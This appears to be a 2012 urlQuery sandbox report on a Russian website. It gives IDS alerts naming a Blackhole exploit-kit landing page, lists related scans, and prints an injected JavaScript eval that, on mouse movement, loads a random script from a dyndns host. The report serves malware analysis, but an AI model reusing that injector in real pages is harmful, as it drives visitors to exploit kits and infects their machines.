Overview

URL: http://giznsochi.ru/index.php?cat=3
IP: 77.222.42.229
ASN: AS44112 SpaceWeb JSC
Location: Russian Federation
Report completed: 2012-11-07 00:57:04 CET
urlQuery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (empty)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-07 00:56:26 | 77.222.42.229 | urlQuery Client | 3 | ET RBN Known Russian Business Network IP (336)

Snort /w Sourcefire VRT
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-07 00:56:26 | 77.222.42.229 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch

The two alerts are of different kinds: the ET rule fires on the reputation of the server IP alone, while the VRT rule (Snort priority 1, the highest) matched the structure of the returned page content itself.


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 77.222.42.229

Date | Alerts / IDS | URL | IP
2013-03-18 19:00:24 | 0 / 2 | http://www.ekbmiloserdie.ru/ | 77.222.42.229
2013-03-13 06:31:28 | 0 / 4 | http://z-mk.ru/components/com_jce/editor/tiny_mce/plugins/browser/classes/javascript. (...) | 77.222.42.229
2013-03-12 07:24:08 | 0 / 4 | http://pitersts.ru/administrator/components/com_content/models/fields/alias.php | 77.222.42.229
2013-03-02 21:45:40 | 0 / 1 | http://raylink.ru | 77.222.42.229
2013-03-01 13:46:13 | 0 / 1 | http://raylink.ru | 77.222.42.229
2013-02-24 07:00:45 | 0 / 11 | http://raylink.ru/wp-content/plugins/achaprvd.html | 77.222.42.229

Last 6 reports on ASN: AS44112 SpaceWeb JSC

Date | Alerts / IDS | URL | IP
2013-03-21 13:22:24 | 0 / 2 | http://samodardeti.ru/administrator/components/com_plugins/helpers/menu.php | 77.222.40.233
2013-03-21 10:26:57 | 1 / 1 | http://www.barnaulpatron.ru/ | 77.222.40.237
2013-03-21 07:32:54 | 0 / 0 | http://imperiy-group.ru/templates/ja_purity/check.php | 77.222.61.242
2013-03-21 07:00:09 | 2 / 44 | http://smaltmosaic.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c002 | 77.222.40.192
2013-03-21 01:56:15 | 0 / 3 | http://spaufa1.ru/ | 77.222.40.153
2013-03-20 22:50:25 | 1 / 2 | http://smaltmosaic.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c002 | 77.222.40.192

Last 6 reports on domain: giznsochi.ru

Date | Alerts / IDS | URL | IP
2012-11-20 09:19:52 | 0 / 2 | http://giznsochi.ru/index.php?act=4 | 77.222.42.229
2012-11-17 18:44:09 | 0 / 2 | http://giznsochi.ru/index.php?cat=4 | 77.222.42.229
2012-11-07 16:02:56 | 0 / 2 | http://giznsochi.ru/index.php?cat=2 | 77.222.42.229
2012-11-07 01:02:49 | 0 / 2 | http://giznsochi.ru/index.php?act=4 | 77.222.42.229
2012-11-06 19:45:15 | 0 / 2 | http://giznsochi.ru/index.php?act=2 | 77.222.42.229
2012-11-06 10:16:35 | 0 / 2 | http://giznsochi.ru/index.php?act=2 | 77.222.42.229



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 699, repeated: 1)

(function() {
    var url = 'http://8rm25dkc.xukddhgakc.dyndns-at-home.com/g/';
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();

Executed Writes (0)



HTTP Transactions (10)


Request Response
GET /index.php?cat=3 HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
GET /style.css HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Sat, 20 Sep 2008 08:19:25 GMT
Etag: "168e0d6-8a1-79d6dd40"
Accept-Ranges: bytes
Content-Length: 2209
GET /userfiles/image/1_02.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1ba-367f-ff322180"
Accept-Ranges: bytes
Content-Length: 13951
GET /userfiles/image/1_01.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:32 GMT
Etag: "176a1b8-30cd-ff50a600"
Accept-Ranges: bytes
Content-Length: 12493
GET /userfiles/image/1_11.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1be-57f-ff322180"
Accept-Ranges: bytes
Content-Length: 1407
GET /userfiles/image/1_05.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1bb-10e-ff322180"
Accept-Ranges: bytes
Content-Length: 270
GET /images/1_08.gif HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:17:36 GMT
Etag: "169a12e-52-fbfa2800"
Accept-Ranges: bytes
Content-Length: 82
GET /userfiles/image/1_09.jpg HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://giznsochi.ru/index.php?cat=3
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 16 Sep 2008 08:18:30 GMT
Etag: "176a1bd-b5f9-ff322180"
Accept-Ranges: bytes
Content-Length: 46585
GET /favicon.ico HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:27 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Content-Length: 209
GET /favicon.ico HTTP/1.1

Host: giznsochi.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=99vsmaml3sbnmtdjtouje1dqe5
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Server: nginx/1.0.10
Date: Tue, 06 Nov 2012 23:56:30 GMT
Connection: keep-alive
Keep-Alive: timeout=10
Content-Length: 209